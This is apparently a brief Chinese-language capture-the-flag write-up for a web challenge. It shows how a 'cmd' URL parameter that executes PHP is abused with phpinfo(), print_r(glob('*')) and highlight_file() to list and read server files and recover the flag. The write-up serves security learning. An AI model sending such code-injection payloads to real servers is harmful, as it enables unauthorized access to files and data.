右键查看源代码
有提示,试一下cmd=phpinfo();
出现回显,采用glob通配符命令得到文件名
php的函数glob(); glob() 函数返回匹配指定模式的文件名或目录。
举个例子:
glob("") 匹配任意文件
glob(".txt")匹配以txt为后缀的文件
有了这个方法我们先把当前目录下所有的文件找出来看看有没有可用的。
输入?cmd=print_r(glob("*"));
打印出了如下文件
尝试进入那个很长的php文件
利用highlight_file函数
/?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
得到flag